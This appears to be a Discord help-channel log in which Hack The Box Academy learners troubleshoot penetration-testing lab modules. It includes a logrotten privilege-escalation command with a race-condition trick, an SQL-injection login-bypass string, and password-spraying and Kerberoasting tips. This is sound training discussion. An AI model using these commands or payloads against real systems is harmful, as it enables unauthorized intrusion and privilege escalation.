┌─[us-academy-4]─[10.10.15.140]─[htb-ac-605555@htb-xrvkqlfhf6]─[~]
└──╼ [★]$ sudo service postgresql status
○ postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; preset: >
     Active: inactive (dead)
```
Should I just use regular Nmap? What do you propose? How should I move forward?
Sorry, I was going on a limb because I was trying to figure it out, so I typed it really fast. I actually copy and pasted the question from the actual module.
And you have to create a bar chart to solve it
you don't have to create anything to solve it
Well I had to find the date :/
the date is very easy to find, you just have to understand what the question is asking
i'd show you, but HTB thinks i'm a bot right now so i can't actually look at the question
I did it didn't work
```
┌─[us-academy-4]─[10.10.15.140]─[htb-ac-605555@htb-xrvkqlfhf6]─[~]
└──╼ [★]$ sudo service start postgresql
start: unrecognized service
```
Try systemctl
ok
it worked thanks
$ sudo systemctl enable postgresql
ok great will do that too
And then check the status!
it still says database not connected
Hm
hold on let me try doing it within metasploit console
ok
And then do /l
ok
After you do the sudo command, type psql in your console to get the sql terminal
Security Monitoring & SIEM Fundamentals - SIEM Visualization Example 4: Users Added or Removed From a Local Group (Within a Specific Timeframe)
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X
this question is deceptively easy, you just have to read it carefully. i've bolded the keyword that you need to note. the notes i have on this question are just one sentence and a screenshot
I did that too
What comes up?
nothing comes up and after /l nothing comes up either
Weird
kind of weird tbh ya maybe should just use nmap?
for first part and see if I run into issues
Yeah
ok I'm logged into meterpreter so I got by just fine so far
I completed the section on my own otherwise and got all the flags
super sweet how well this is going
I think the remaining 4 sections of this module are just notetaking sections and text content and then I get to move onto password attacks
which will be great
anyway I think this section went by quickly like in one or two weeks
which is fabulous
I'm certainly getting better at working through the HTB Academy material
Thats great!
How long does this typically take ? logrotten
||./logrotten -p ./payload /home/htb-student/backups/access.log Waiting for rotating /home/htb-student/backups/access.log...||
it's like instant
it seems I needed to simulate a log write with ||echo test >> /home/htb-student/backups/access.log;./logrotten -p ./payload /home/htb-student/backups/access.log||, otherwise it was not working, I guess that's where the race condition aspect comes from, but the module does a very poor job at explaining how this exploit works....
it's a very finicky exploit and you have to be fast
yeah for some reason I could not get it to set the SUID bit, only getting a reverse shell and setting the SUID quickly from there
,
E
you should delete the pic
i believe it's because the cred dump includes the ntlm hash of the different identities allowed by the delegation
Hello guys am just starting with my academy lessons I need help with this question. Which shell is specified for the htb-student user?
sorry what? is that in a module or something?
please help me on last 2 Q. : Password Attacks | Pass the Ticket (PtT) from Linux
I'm in "root@linux01:/#" but still getting failed
https://academy.hackthebox.com/module/80/section/837
I have no idea about What is one prominent issue with passwords? in this module.
Can someone please help me?
hi all, apparently I'm stuck a first Skills Assessment first question DACL ATTACKS I: "What's the username of the account that Carlos can perform a targeted Kerberoasting attack against?"
I used sharphound to collect data and ingest into Bloodhound, set carlos as "owned" a then used "List all kerberoastable accounts".
Actually I got 3 users, and I am able to get hashes for all of them, but none is the correct answer. Any suggestion? thank you!
it's easier for you to help people if you have the module name and section name along with what you have tried and your current understanding
as for your question, see: https://man7.org/linux/man-pages/man5/passwd.5.html
Hello ??
I have a question regarding oscp
The price for 3 months access is 1649$ does that mean I should do the exam right after the end of my course access? Or I can do it later on?
Any idea why this isn't running? I think the command is correct, it should be running...
The module name is Linux fundamentals
You can DM me
Worked with crackmap, hydra doesn't run ...
Academy - module - Web Fuzzing - Virtual Host and Subdomain Fuzzing - Question - Using GoBuster against the target system to fuzz for vhosts using the common.txt wordlist, which vhost starts with the prefix "web-"? Respond with the full vhost, eg web-123.inlanefreight.htb - The command to run is - gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/SecLists/Discovery/Web-Content/common.txt --append-domain - But there is no VHOST starting with "web-" ?? any other method to find it ? or is my command wrong ? Plz help
Why are you using port 81?
https://academy.hackthebox.com/module/113/section/2139 Module Attacking Thick Client Applications
I don't understand, everything goes wrong for me already in the first stage.
No, I am using the IP:Port of the machine... It's just the default command given in the module... Sorry I didn't change it
Anyone know what the header on the title page says when opening the aquatone html page?
Did you enter the IP and domain in the hosts file?
open a page and have a look 😉
@acoustic owl Hi can you help plz
What exactly is the problem? You started a program and it terminated after the work was done. This is completely normal behavior
In this step, I don't have a .exe file created.
Hi, i am currently working on the Attacking AD module section Password spraying from linux
I am working on the end of section question "Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer."
I enumerated users using an anonymous ldap bind. Filtered the list of found users for those beginning with s. Then used crackmapexec to attempt to login with Welcome1 as a password for the saved user list. I used the UserPrincipalName as opposed to the SAMAccountName as the username
You have to go through the module step by step. If you miss a small detail, it will not work.
Restart the Machine and try again
Thus far haven't been able to locate the user which has Welcome1 password
I feel like the user enumeration should be fine as it's via an ldap anon bind on the DC itself so i should have "all" the users to try
perhaps sam account name and local login to the DC
any hints welcome
i'd use kerbrute rather than cme/nxe for password spraying
has anyone installed bloodhound on pwnbox successfully before?
did you use the one given or install via pipx install bloodhound
or pipx install bloodhound.py ?
ok i can try with kerbrute, but in this case i don't expect the results to be different.... however for reasons of stealth kerbrute is prob. a better option, right?
Then one more question. When I run ProcMon64 to RestartOracle-Service, but I don't see for some reason and even through the search ctrl + f
i believe it's faster since it uses Kerberos to authenticate rather than authenticating to SMB and having to query the DC
yes faster for sure
but i don't understand why i got kerbrute report success and crackmapexec not report hit
So it is already on the machine
could be a number of reasons
hmmm
Again, do exactly what it says step by step
If it says to download it, then download it
maybe with crackmapexec i am trying to login to smb
i'm using smb to login.... not using local-auth
in password attacks password mutation, do you really have to wait this long (21h)?
It wasn't told to add the IP to hosts file... But still did with the domain "inlanefreight.htb".... Didn't work
Interesting
using samaccountname with crackmapexec and smb protocol works
using kerbrute UserPrincipalname works
htb is not an authorized top level domain. Therefore, the root servers cannot resolve this top level domain. For this reason, you must always resolve such a domain locally
just grab it from source
git clone https://github.com/dirkjanm/BloodHound.py
cd BloodHound.py
pipx install .
Ok will remember this... What domain shall I add for this module ?
Cause I tried the inlanefreight.htb... didn't work ?
This domain was mentioned in the examples
For which domain are you looking for a vHost?
You can only enter the domain, not the port in the hosts file.
10.10.10.10 example.com
Ohh... Didn't know that, will try it again after some time
Thanks
Hi all, I have a question regarding the “Get started” module, “public exploit” section.
The exercise says “Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file.”
How could I know there is indeed a txt file with that specific name at that address? Would that be by using gobuster explained in a previous section?
what's the first thing one usually do when they get an IP address?
At my knowledge level? ping, nmap and maybe browse to the IP address
So don't you know what's on the webpage of that Ip adress when you browse it?
You can use searchsploit to find vulnerabilities.
Yes, I could find the "wp_simple_backup_file_read" vulnerability and use it. My question is rather how would I know the target filepath "/flag.txt" if Academy had not provided it in the first place? I guess there should be a way to enumerate subdomains or files? (hence my guess of gobuster)
That filepath is the path where you want your outputs to be.
Isn't it the target? had to change it for the /flag.txt in order to complete the exercise
Did it work?
About filepath. I'm not sure. But I'd assume these are configurations we are setting for the exploit. One of those is where you want your outputs to be created. But then again, that shouldn't be specified as required. Could it be the directory at the target's end? In home, probably.
What was the content of flag.txt? Probably not a password.
Yes, it was a string of characters to validate the exercise. It was indeed the directory at target's end. Thanks for your help 🙂
Conclusively. I'm not sure the directory was at target's end.
But it sure worked when i assumed so.
You may research more about it. You're welcome.
I have been stuck on the same section, I ran the nmap scan and it returns me two different nginx web servers running on the host. How did you find out the WordPress service?
by browsing to the host IP with Firefox, the service is written on the main page
God 🤦♂️ I have been running nmap scans and finding everything instead of just accessing the host.
thanks man!
I think I can figure out the rest
I understand, I started HtB by only using the terminal to enumerate. But the Web Request module got me used to browse randomly just in case
I will add this step to my "first things first" list xD
Hello everyone, I just want to ask a question. Is there any news about any module that will focus on Cloud PenTesting, or something similar? Or will there be any such module in the future? Thanks
hello, can i share the documentation i made about the Attacking Enterprise module on LinkedIn or is it against some rule
You certainly should not share writeups about enterprise content.
Hello, i have just finished my degree in computer science. I have picked cyber security as a field to get my master's degree at. My intention was to get into ethical hacking but i have found myself defending instead of attacking '-'. Could you guys recommend me a road map to get started in White hat hacking? Thank you all in advance and my apologies for my English '-'
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
🙂
Hello,
Module: Footprinting
section: SMTP
Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
Hint :On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response
I have found the answer using a specific module in metasploit. However, I can't say the same thing using dedicated scripts (smtp-enum-users.pl). Did you have the same experience? Is it an issue with me or with the tools?
Soc path is good. If you wanna learn defensive or blue teaming.
I stated that i want to learn red teaming
Cpts might be good option for you. I'm doing it.
I got the answer using the smtp-user-enum
hello, I'm stuck on password attacks/Network Services, last flag, smb. Can someone help?
already found but nothing is writable or readable
evil-winrm bro ..
use it for connect to log in with the credentials you found
i already did evilwin i'm talking about smb
yes but you have listed the file shares but now you have to connect so remove the --smb option
where connect i cant read/write?
~tts_hello_world
you are on the wrong channel for such messages
Hi, I have just subscribed to the silver annual htb plan and the acknowledgment email sent to me mentioned "Access to the one-to-one lab exercise tutoring through Discord." I would like to know what is it and how can i make use of it?
868599843776512030
yup, fully aware of that
ah but in your previous screenshot you used john that's why I'm telling you this from now on if you use the user Cassie use smbclient with user cassie
• Gateway Latency: 90ms
• Start time: 2 days ago
• Version: 1.2.8
Please keep the channel on topic
oh right this was crazy lol thanks
I love SOC because people trust you so much more
thats true yeah
i do pentesting path cause i find it more fun to do practical based stuff
atleast u have fun with what u enjoy + money
I do both pentesting and defense. I work on the blue team, but being able to do both helps you really understand what’s going on.
Any idea what could help if you keep getting disconnected from rdp sessions ?
Hello, I am having some problems with RDP and SOCKS Tunneling with SocksOverRDP (https://academy.hackthebox.com/module/158/section/1439). My RDP connection crash every 30s
Haha mine as well but not with socks
Oh I see, same problem here
Maybe there are some problems
use TCP for your vpn
It seems works, thank you!
it works but shouldnt tcp be slower?
..altough it seems like it isnt
technically it is but you probably won't notice it doing the labs
Lazagne keeps dropping after a couple of seconds on the target box, any ideas what might be the cause?
I have a problem with the Linux privilege escalation module
It's about the Privileged Groups part
So it's all about the lack of the unzip tool which I can't download due to lack of rights to do so
I know it's a different user but in the questions it tells me to use the secaudit account
In the File Transfer module, what's the difference between (New-Object Net.WebClient).UploadFile and Invoke-FileUpload from https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1
?
Why do I have to use Invoke-FileUpload if there is already a built-in function called UploadFile in System.Net.WebClient?
Hello, I'm stuck on password attacks/Attacking SAM, in the last question, dumping LSA. Can anyone help? I used all passwords found
transfer alpine on your system 😉
It looks to me like either should work. Have you tested it? If both work, I'd lean toward using the native function. I thought maybe Invoke-WebRequest was created before WebClient.UploadFile was available, but think UploadFile() was available at the time.
The documentation suggests WebClient is outdated, however. Maybe the benefit of invoke-FileUpload is having a familiar interface instead of whatever no longer deprecated. 😏
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.uploadfile?view=net-8.0
I think that in the exercise they want us to get used to the tools but we can use the 2, imagine the command Net.webclient system is deactivated we can download Invoke-fileupload on the machine (if there is internet) and be able to use it.
ping
someone mind helping with a sanity check on the BBH -> SQLi Fundamentals -> SQL Operators Module
https://academy.hackthebox.com/module/33/section/192
The task is a trivial count on a key in a table, but I'm not understanding how there's a nested table? I don't think that's allowed.
```
+--------------------+
| Database           |
+--------------------+
| employees          |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.070 sec)

MariaDB [employees]> use employees;
Database changed
MariaDB [employees]> describe employees;
+------------+---------------+------+-----+---------+-------+
| Field      | Type          | Null | Key | Default | Extra |
+------------+---------------+------+-----+---------+-------+
| emp_no     | int(11)       | NO   | PRI | NULL    |       |
| birth_date | date          | NO   |     | NULL    |       |
| first_name | varchar(14)   | NO   |     | NULL    |       |
| last_name  | varchar(16)   | NO   |     | NULL    |       |
| gender     | enum('M','F') | NO   |     | NULL    |       |
| hire_date  | date          | NO   |     | NULL    |       |
+------------+---------------+------+-----+---------+-------+
6 rows in set (0.071 sec)

MariaDB [employees]> ### not seeing titles here...
MariaDB [employees]> describe titles;
+-----------+-------------+------+-----+---------+-------+
| Field     | Type        | Null | Key | Default | Extra |
+-----------+-------------+------+-----+---------+-------+
| emp_no    | int(11)     | NO   | PRI | NULL    |       |
| title     | varchar(50) | NO   | PRI | NULL    |       |
| from_date | date        | NO   | PRI | NULL    |       |
| to_date   | date        | YES  |     | NULL    |       |
+-----------+-------------+------+-----+---------+-------+
4 rows in set (0.070 sec)

MariaDB [employees]> ### titles is a table, inside the employees table???
MariaDB [employees]>
```
I've been trying a few weird ass commands to try to source the full db location of this "titles" table but not having much luck, this sorta schema stuff is new to me
```
+--------------+------------+
| TABLE_SCHEMA | TABLE_NAME |
+--------------+------------+
| employees    | titles     |
+--------------+------------+
1 row in set (0.070 sec)

MariaDB [employees]>
```
table schema? i thought employees was the table name?
oh gosh
employees = database
that being said, when i did the describe employees; why did it not reveal titles?
(i think this the part that got me twisted up)
unless theres a table named employees in the employee database?
Password Attacks, Passwd, Shadow & Opasswd: running hashcat on the root hash with the whole rockyou takes an estimated 4 hours. Is there a faster way to achieve this?
After you have switched to a database, you should take a look at the tables in it
SHOW TABLES;
ah, got it.
You don't have to use rock you to solve this one... think of alternatives.
thanks!
is there any way to view an htb lab's php source contents? I'm doing a trivial sqli lab but this time around I'd like to see what the php server is doing... I've viewed the page source and there's no php, but I'm not terribly well versed in back end development so I'm not entirely sure where to look, especially as a "user"
you'll need the PHP file for that
so if you have some superuser privs as the user in the database, you can probably find a way to get it
oh you know what, it's a seriously canonical example (login logic bypass), maybe chatgpt can whip something up in kind
like a username: admin' or '1=1 type deal
yeah chat gpt got me sorted
@quiet trout hey can u give me a step by step course guide for becoming a hacker
peep this https://roadmap.sh/cyber-security
hmm, that would make sense. Thanks Hibooxx
do you like reading books? books work best.
lol it says CEH is an "advanced certification"
I wasn't talking about that 😒
it's a good start
the modules are step by step guides themselves
they walk you through an overview, how it works, shows you commands you can use, shows you what you should expect for results, then it tests you on that knowledge with a skill assessment
Are the modules in a step-by-step guide?
I am not talking about the path
a htb path is just a series of modules
Should I go for direct modules or choose a path
since you're just starting you should probably start with some of the fundamental modules and then move on to a path like cpts
That was the confusion I was thinking how should I start
start with the tier 0 modules like getting started
So modules are in order right
in the path they are
What if I go every single modules one by one
then you will learn a lot
@cloud urchin do u work in htb
no
So did u also take the modules from htb
yes i did
How long will it take to complete all modules one by one
i didn't complete every single one. i completed all the modules in the cpts path and a few modules that looked interesting to me. took me about 1.5 months putting in 8+ hours a day
that grants read permissions to the owner of the file. root can also read it just because they're root.
What all did u learn from the modules
too much to list here
both
Can u tell me some of the hacks u learned
here's a pic of my notes, each one of the circles contains a ton of info about a specific topic, if this puts it into perspective for you.
hi! I have a problem connecting to the target with the VM, the linux terminal gives me only error [0x00020006]
text is unreadable 😭
ya don't need to read it lol
of course not, but it's cool to see all the relations between certain topics/skills
what's that done in
obsidian
if you look at the graph view that's what shows up
didn't know that was possible
@cloud urchin r u able to code a malware 😏
network, ad, wireless, etc
Hello, I have a problem with one of the machines. It asks me about the Redis database and gives me two options. I put the correct one and it gives me an error. I tried to put the one I think is incorrect and it gives me an error. Can you help me too?
nah i like hcxdumptools
Any advice on what to do if a module target machine refuses to spawn?
Try hard refreshing your browser with CTRL + SHIFT + R
btw guys, this a channel for modules, there is another channel for general chat @steady warren @cloud urchin
No luck 😦
yeah he was asking about the modules but it veered off topic
he's right
enjoyed the dialog tbh, but I was thinking that the mods might get mad
What do u guys vote for Cyber security or Hacking